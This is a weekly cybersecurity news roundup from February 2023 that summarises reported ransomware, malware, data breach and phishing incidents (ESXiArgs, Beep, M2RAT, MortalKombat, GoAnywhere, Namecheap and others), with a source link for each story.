Thursday, February 16th, 2023
Cybersecurity Week in Review (17/2/23)
ESXiArgs Ransomware Hits Over 500 New Targets in European Countries
A new strain of ransomware called “ESXiARGS” has infected over 500 companies and organisations worldwide. The ransomware is delivered via phishing emails containing malicious attachments, which, when opened, infect the victim’s system and encrypt their files. The attackers demand a ransom payment in exchange for a decryption key that would restore access to the encrypted files.
The first set of infections dates back to October 12, 2022, much earlier than when the campaign began to gain traction at the start of February 2023. Then on January 31, 2023, ransom notes on two hosts are said to have been updated with a revised version that matches the ones used in the current wave. Some of the crucial differences between the two ransom notes include the use of an onion URL instead of a Tox chat ID, a Proton Mail address at the bottom of the note, and a lower ransom demand (1.05 Bitcoin vs. 2.09 Bitcoin).
The attackers behind ESXiARGS appear to be specifically targeting organisations that use virtualisation software, such as VMware ESXi. The ransomware is designed to target virtual machines running on these systems, which can result in widespread data loss and disruption for the affected organisations.
The vulnerability in VMware ESXi is a clear reminder of the importance of keeping systems up to date with the latest security patches as attackers don’t need to scour for new exploits or novel techniques when they know that many organisations are vulnerable to older exploits.
The spike also coincides with an 87% year-over-year increase in ransomware attacks targeting industrial organisations in 2022, with 437 out of 605 attacks striking the manufacturing sector.
Source – https://thehackernews.com/2023/02/esxiargs-ransomware-hits-over-500-new.html
Experts Warn of ‘Beep’ – A New Evasive Malware That Can Fly Under the Radar
A new piece of evasive malware dubbed Beep has been discovered that’s designed to fly under the radar and drop additional payloads onto a compromised host. The malware has been implemented with as many anti-debugging and anti-VM (anti-sandbox) techniques as possible.
One such technique involves delaying execution through the use of the Beep API function, hence the malware’s name. Beep comprises three components, the first of which is a dropper that’s responsible for creating a new Windows Registry key and executing a Base64-encoded PowerShell script stored in it.
The PowerShell script, for its part, reaches out to a remote server to retrieve an injector, which, after confirming it’s not being debugged or launched in a virtual machine, extracts and launches the payload via a technique called process hollowing. The payload is an information stealer that’s equipped to collect and exfiltrate system information and enumerate running processes. Other instructions the malware is capable of accepting from a command-and-control (C2) server include the ability to execute DLL and EXE files.
A number of other features are yet to be implemented, suggesting that Beep is still in its early stages of development. What sets the emerging malware apart is its heavy focus on stealth, adopting a sheer number of detection evasion methods in an attempt to resist analysis, avoid sandboxes, and delay execution.
Delivered via spam email attachments, Discord, or OneDrive URLs, the malware is suspected to be offered as a service for other criminal actors looking to distribute their own payloads.
Source – https://thehackernews.com/2023/02/experts-warn-of-beep-new-evasive.html
North Korea’s APT37 Targeting Southern Counterpart with New M2RAT Malware Attack
The North Korea-linked threat actor tracked as APT37 has been linked to a piece of new malware dubbed M2RAT in attacks targeting its southern counterpart, suggesting continued evolution of the group’s features and tactics.
APT37, also tracked under the monikers Reaper, RedEyes, Ricochet Chollima, and ScarCruft, is linked to North Korea’s Ministry of State Security (MSS) unlike the Lazarus and Kimsuky threat clusters that are part of the Reconnaissance General Bureau (RGB). MSS is tasked with domestic counterespionage and overseas counterintelligence activities, with APT37’s attack campaigns reflective of the agency’s priorities. The operations have historically singled out individuals such as defectors and human rights activists.
The threat actor is known to rely on customised tools such as Chinotto, RokRat, BLUELIGHT, GOLDBACKDOOR, and Dolphin to harvest sensitive information from compromised hosts. The main feature of this RedEyes Group attack case is that it used a Hangul EPS vulnerability and used steganography techniques to distribute malicious codes.
The infection chain observed in January 2023 commences with a decoy Hangul document, which exploits a now-patched flaw in the word processing software (CVE-2017-8291) to trigger shellcode that downloads an image from a remote server. The JPEG file uses steganographic techniques to conceal a portable executable that, when launched, downloads the M2RAT implant and injects it into the legitimate explorer.exe process.
While persistence is achieved by means of a Windows Registry modification, M2RAT functions as a backdoor capable of keylogging, screen capture, process execution, and information theft. Like Dolphin, it’s also designed to siphon data from removable disks and connected smartphones.
This is not the first time CVE-2017-8291 has been weaponised by North Korean threat actors. In late 2017, the Lazarus Group was observed taking advantage of the flaw in attacks targeting South Korean cryptocurrency exchanges and users to deploy Destover malware, according to Recorded Future.
Source – https://thehackernews.com/2023/02/north-koreas-apt37-targeting-southern.html
Expert warns Irish universities to ‘urgently’ review cybersecurity after MTU data leaked on dark web
The chief executive officer of Smarttech247 Raluca Saceanu advised third-level colleges in Ireland to “urgently” review their protocols following a ransomware attack at an Irish university.
It is understood a large amount of staff and student data, including financial and medical details have been uploaded to the dark web by hackers who demanded a ransom from Munster Technological University (MTU) last week. Raluca stated that an awareness of cybersecurity basics can be a “crucial” preventative step.
Higher Education Minister Simon Harris reiterated the support being offered by the authorities to MTU, where classes resumed this week following a closure of services last week. Staff and students at MTU have been urged to be vigilant following the attack.
They were notified by the university on Sunday evening that its data had been copied and shared on the dark web. It is understood a large amount of staff and student data, including financial and medical details have been put on the dark web by the hackers. MTU had previously revealed it was being blackmailed and held to ransom by a group of hackers, believed to be based either in Russia or part of the former Soviet Union, the High Court heard last week.
The cyberattack on MTU’s IT system, detected in recent days, is believed to have been carried out by individuals in a ransomware group known as ALPHV, BlackCat or Noberus, the court heard. MTU had claimed those suspected of carrying out the attack are understood to be made up of former members of the ‘REvil’ ransomware group, which in 2022 attacked a supplier of Apple and was based in Russia.
The college secured an interim injunction from the High Court, in response to the incident, as an attempt to “mitigate” the data breach and to “prevent the sale, publication, sharing, possession, or any other use of any data illegally obtained from MTU systems in the course of this ransomware incident.”
Smarttech247 is behind the cybersecurity conference Zero Day Con, and Ms Saceanu said the disruption caused to students and staff at MTU is a “nightmare scenario” for any organisation.
“Finding yourself at the centre of an attack by ruthless bad actors can have a devastating effect on your business so without a doubt, prevention is better than cure,” she said.
“While investigations into how this incident unfolded are continuing, we strongly advise third-level institutions all over the country to act now and review the measures they have in place that could be key to stopping something similar happening to them.”
Ms Saceanu outlined some “golden rules” for an organisation’s protection, which she said must be prioritised in any review.
Organisations should implement firewalls, intrusion detection systems, and secure routers to prevent unauthorised access to the university’s network. They should also implement “event monitoring capabilities” to ensure that should an intrusion occur, a security team can act fast and respond to the incident accordingly. Institutions must ensure that sensitive data such as student records, research data, and financial information is encrypted “both in transit and at rest”.
They should also implement “strong authentication methods” such as two-factor authentication and regularly monitor user access to sensitive systems and data as well as implementing anti-virus and anti-malware software to prevent malicious attacks.
Source – https://www.independent.ie/news/expert-warns-irish-universities-to-urgently-review-cybersecurity-after-mtu-data-leaked-on-dark-web-42341254.html
New ‘MortalKombat’ ransomware targets systems in the U.S.
Hackers conducting a new financially motivated campaign are using a variant of the Xortist commodity ransomware named ‘MortalKombat,’ together with the Laplas clipper in cyberattacks.
Both malware infections are used to conduct financial fraud, with the ransomware used to extort victims to receive a decryptor and Laplas to steal cryptocurrency by hijacking crypto transactions. Laplas is a cryptocurrency hijacker released last year that monitors the Windows clipboard for crypto addresses and, when found, substitutes them for addresses under the attacker’s control.
As for MortalKombat, the new ransomware is based on the Xorist commodity ransomware family, which utilises a builder that lets threat actors customise the malware. Xorist has been decryptable for free since 2016. The attacks focused mainly on the United States, with some victims also in the UK, Turkey, and the Philippines.
The email contains a malicious ZIP attachment containing a BAT loader script that downloads a second archive from a remote resource. This archive contains one of the two malware payloads. The loader script will execute the downloaded payload as a process in the compromised system and then delete the downloaded files to minimise the chances of detection. The email message carries a malicious ZIP attachment that contains a BAT loader script, that when opened, downloads a second archive from a remote resource. This archive contains one of the two malware payloads. The loader script will execute the downloaded payload as a process in the compromised system and then delete the downloaded files to minimise chances of detection.
MortalKombat is a Xorist ransomware variant first discovered in January 2023, named after the popular fighting video game and featuring a ransom note/wallpaper that includes art from the franchise. The ransomware isn’t very sophisticated as it will target system files and applications too, which are commonly avoided to prevent the system from becoming unstable.
The wallpaper also acts as a ransom note, instructing the victim to use the qTOX Tor-based instant messaging app to negotiate with the cybercriminals who demand payment in Bitcoin. The attacker also provides a ProtonMail email address if the victim has trouble registering a new account on qTOX. Although MortalKombat does not feature wiper functionality, it corrupts system folders like the Recycle Bin so that the victims cannot retrieve files from there, disables the Windows Run command window, and removes all entries from Windows startup.
Moreover, the ransomware fiddles with the Windows registry, creating a Run registry key (“Alcmeter”) for persistence while deleting the installed application’s root registry key in the HKEY_CLASSES_ROOT registry hive. The HKEY_CLASSES_ROOT hive stores information about file associations, commands, and icons used for each file type, so deleting these entries means the applications can no longer function.
Analysts do not know what the operational model of MortalKombat ransomware is, and whether it is the custom strain of a lone threat actor or is sold to other cybercriminals like Laplas.
Source – https://www.bleepingcomputer.com/news/security/new-mortalkombat-ransomware-targets-systems-in-the-us/
Eurostar forces ‘password resets’ — then fails and locks users out
International high-speed rail operator, Eurostar, is emailing its users this week and forcing them to reset their account passwords in a bid to “upgrade” security. Eurostar is well known for connecting the United Kingdom to France, Belgium, and Netherlands with most of its trains crossing the Channel Tunnel.
Eurostar is emailing all customers, forcing them to reset their account passwords as the railway operator claims to be “busy” upgrading account security for everyone. But users who visit the password reset link are met with “technical problems,” thereby making it impossible for them to reset their password or log in to their accounts.
Upon every successful log in attempt, users are presented with the password reset interstitial that won’t let them access their account until a password reset is performed. However, the password reset never takes place due to the aforementioned technical error. The bug has caused increased frustration among Eurostar passengers and users around the world who are now effectively locked out of their accounts.
In a long Twitter thread posted Friday, Eurostar admitted being aware of users met with issues when attempting to access Club Eurostar accounts and blamed it on ongoing maintenance. But, this was prior to the company sending out password reset emails. The railway operator, at the time, had advised customers to clear their browser cookies or re-attempt registration using the same email address. But this does not seem to work as a solution for anyone.
Eurostar last enforced a widespread password reset in 2018 when it had experienced a data breach, as reported by The Telegraph at the time. It is not yet known if the forced password reset is indeed Eurostar’s way of tightening account security, or if the action is prompted by a cybersecurity incident, such as unauthorised access to systems or a data breach.
Source – https://www.bleepingcomputer.com/news/security/eurostar-forces-password-resets-then-fails-and-locks-users-out/
Healthcare giant CHS reports first data breach in GoAnywhere hacks
Community Health Systems (CHS) says it was impacted by a recent wave of attacks targeting a zero-day vulnerability in Fortra’s GoAnywhere MFT secure file transfer platform.
The healthcare provider giant said on Monday that Fortra issued an alert saying that it had “experienced a security incident” leading to some CHS data being compromised. A subsequent investigation revealed that the resulting data breach affected the personal and health information of up to 1 million patients.
CHS stated that while the investigation is still ongoing, the Company believes that the Fortra breach has not had any impact on any of the Company’s information systems and that there has not been any material interruption of the Company’s business operations, including the delivery of patient care. It also added that it would offer identity theft protection services and notify all affected individuals whose information was exposed in the breach.
CHS is a leading healthcare provider that operates 79 affiliated acute-care hospitals and over 1,000 other sites of care across the United States.
The Clop ransomware gang claims to be behind these attacks and stated that they’ve breached and stolen data from over 130 organisations. Clop also said they had allegedly stolen the data over ten days after breaching GoAnywhere MFT servers vulnerable to exploits targeting the CVE-2023-0669 RCE bug. The gang didn’t provide proof or additional details regarding their claims, if they had already started extorting victims, or what ransoms they were asking for.
Links have been found between the GoAnywhere MFT attacks and TA505, a threat group known for deploying Clop ransomware in the past. Clop is known for using a similar tactic in December 2020, when they discovered and exploited a zero-day bug in Accellion’s legacy File Transfer Appliance (FTA) to steal large amounts of data from roughly 100 companies worldwide. At the time, the victims received emails demanding $10 million in ransoms to avoid having their data published on the cybercrime group’s data leak site.
Organisations that had their Accellion servers hacked include, among others, energy giant Shell, cybersecurity firm Qualys, supermarket giant Kroger, and multiple universities worldwide such as Stanford Medicine, University of Colorado, University of Miami, University of California, and the University of Maryland Baltimore (UMB). If Clop follows a similar extortion strategy, we will likely see a rapid release of data for non-paying victims on the threat actor’s data leak site in the near future.
GoAnywhere MFT’s developer Fortra (formerly known as HelpSystems) disclosed to its customers last week that a new vulnerability (CVE-2023-0669) was being exploited as a zero-day in the wild. The company issued emergency security updates after a proof-of-concept exploit was released online, allowing unauthenticated attackers to gain remote code execution on vulnerable servers.
Even though Shodan currently shows that over 1,000 GoAnywhere instances are exposed to attacks, only 136 are on ports 8000 and 8001 (the ones used by the vulnerable admin console). Fortra also revealed, after releasing patches, that some of its MFTaaS hosted instances were also breached in the attacks.
CISA added the GoAnywhere MFT flaw to its Known Exploited Vulnerabilities Catalog on Friday, ordering U.S. federal agencies to secure their systems within the next three weeks, until March 3rd.
Source – https://www.bleepingcomputer.com/news/security/healthcare-giant-chs-reports-first-data-breach-in-goanywhere-hacks/
Pepsi Bottling Ventures suffers data breach after malware attack
Pepsi Bottling Ventures LLC suffered a data breach caused by a network intrusion that resulted in the installation of information-stealing malware and the extraction of data from its IT systems.
Pepsi Bottling Ventures is the largest bottler of Pepsi-Cola beverages in the United States, responsible for manufacturing, selling, and distributing popular consumer brands. It operates 18 bottling facilities across North and South Carolina, Virginia, Maryland, and Delaware.
In a sample security incident notice filed with Montana’s Attorney General office, the company explains that the breach occurred on December 23, 2022. But it wasn’t until January 10th, 2023, or 18 days later that it was discovered, with remediation taking even longer.
The notice stated that an unknown party accessed their internal IT systems on or around December 23, 2022, installed malware, and downloaded certain information contained on the accessed IT systems. They are continuing to monitor the systems for unauthorised activity but the last known date of unauthorised IT system access was January 19, 2023
Based on the results of Pepsi’s internal investigation so far, the following information has been impacted:
- Full names
- Home address
- Financial account information (including passwords, PINs, and access numbers)
- State and Federal government-issued ID numbers and driver’s license numbers
- ID cards
- Social Security Numbers (SSNs)
- Passport information
- Digital signatures
- Information related to benefits and employment (health insurance claims and medical history)
In response to this incident, the company has implemented additional network security measures, reset all company passwords, and informed the law enforcement authorities. At this time, the review of potentially affected records and systems is still underway, while all affected systems have been suspended from the firm’s regular operations.
The recipients of the breach notices are being offered a one-year free-of-charge identity monitoring service through Kroll to help them prevent identity theft that may occur as a result of the stolen data.
It is still not clear how many individuals were affected by the data breach and whether the affected parties include customers or employees.
Source – https://www.bleepingcomputer.com/news/security/pepsi-bottling-ventures-suffers-data-breach-after-malware-attack/
Lazarus hackers use new mixer to hide $100 million in stolen crypto
North Korean hackers have found a way around U.S.-imposed sanctions to launder the cryptocurrency proceeds from their heists, according to evidence discovered by blockchain analysts.
The Lazarus Group, as the threat actor is typically referred to, has laundered about $100 million in stolen Bitcoin since October 2022 through a single crypto-mixing service called Sinbad. Last year, the U.S. Treasury’s Office of Foreign Assets Control (OFAC) announced sanctions against the cryptocurrency mixing services Blender and Tornado Cash, which Lazarus had used to launder close to $500 million in illicitly obtained cryptocurrency. The measure was taken after more than $600 million in crypto assets were stolen from Axie Infinity’s cross-chain bridge in a hack later attributed to the North Korean Lazarus group.
Hackers often use cryptocurrency mixers/tumblers because, for a fee, they allow hiding the origin and owners of the funds by blending the assets of a larger number of users. While the OFAC sanctions did not stop Tornado Cash, they put a stop to Blender, whose operator disappeared after reportedly taking from the mixer almost $22 million in Bitcoin. Blender’s operator very likely started in early October 2022 a new service called Sinbad, which is being used by Lazarus to launder assets. The connection emerged after the Harmony Horizon crypt heist in June 2022 that led to about $100 million in losses.
Soon after the hack, strong links were found with Lazarus, something that the FBI confirmed earlier this year, by following the funds through the Tornado Cash mixing service. Typically, the actor combined Tornado Cash crypto mixing with a custodial-based service, like Blender. This time though, they used another Bitcoin mixer called Sinbad. Unlike Tornado Cash, both Blender and Sinbad are custodial mixers, meaning that all cryptocurrency that goes into the service is under the control of the operator; so owners have sufficient confidence to give up command of their funds.
Researchers found that a “service” address on the Sinbad site received Bitcoin from a wallet believed to belong to the operator of Blender. The same wallet was used to pay for promoting the new crypto mixer and to fund almost all initial transactions coming to Sinbad, about $22 million. Apart from the wallet, the researchers also noticed a similar on-chain pattern behavior for both mixers, which includes specific characteristics of transactions.
Although referred to as one group, Lazarus defines multiple North Korean operators tasked by the government with collecting intelligence as well as stealing money to support national-level priorities and objectives. Besides targeting cryptocurrency exchanges, North Korean threat actors also engaged in ransomware attacks using several locker strains against health sector organisations in the U.S. and South Korea.
Source – https://www.bleepingcomputer.com/news/security/lazarus-hackers-use-new-mixer-to-hide-100-million-in-stolen-crypto/
NameCheap’s email hacked to send Metamask, DHL phishing emails
Domain registrar Namecheap had their email account breached Sunday night, causing a flood of MetaMask and DHL phishing emails that attempted to steal recipients’ personal information and cryptocurrency wallets. The phishing campaigns started around 4:30 PM ET and originated from SendGrid, an email platform used historically by Namecheap to send renewal notices and marketing emails.
After recipients began complaining on Twitter, Namecheap CEO Richard Kirkendall confirmed that the account was compromised and that they disabled email through SendGrid while they investigated the issue. Kirkendall also said that they believe the breach may be related to the API keys of Mailgun, MailChimp, and SendGrid being exposed in mobile apps.
The phishing emails sent in this campaign are impersonating either DHL or MetaMask. The DHL phishing email pretends to be a bill for a delivery fee required to complete the delivery of a package. The embedded links lead to a phishing page attempting to steal the target’s information. The MetaMask phishing email, pretends to be a required KYC (Know Your Customer) verification to prevent the wallet from being suspended.
“We are writing to inform you that in order to continue using our wallet service, it is important to obtain KYC (Know Your Customer) verification. KYC verification helps us to ensure that we are providing our services to legitimate customers,” reads the MetaMask phishing email.
“By completing KYC verification, you will be able to securely store, withdraw, and transfer funds without any interruptions. It also helps us to protect you against financial fraud and other security threats.”
“We urge you to complete KYC verification as soon as possible to avoid suspension of your wallet.”
This email contains a marketing link from Namecheap (https://links.namecheap.com/) that redirects the user to a phishing page pretending to be MetaMask. This page then prompts the user to enter their ‘Secret Recovery Phrase’ or ‘Private key’. Once a user provides either the recovery phrase or private key, the threat actors can use them to import the wallet to their own devices and steal all the funds and assets.
Namecheap published a statement Sunday night stating that their systems were not breached but rather it was an issue at an upstream system that they use for email. After the phishing incident, Namecheap says they stopped all emails, including two-factor authentication code delivery, trusted devices’ verification, and password reset emails, and began investigating the attack with their upstream provider.
While Namecheap did not state the name of this upstream system, the CEO of Namecheap previously tweeted that they were using SendGrid, which is also confirmed in the phishing emails’ mail headers.
Source – https://www.bleepingcomputer.com/news/security/namecheaps-email-hacked-to-send-metamask-dhl-phishing-emails/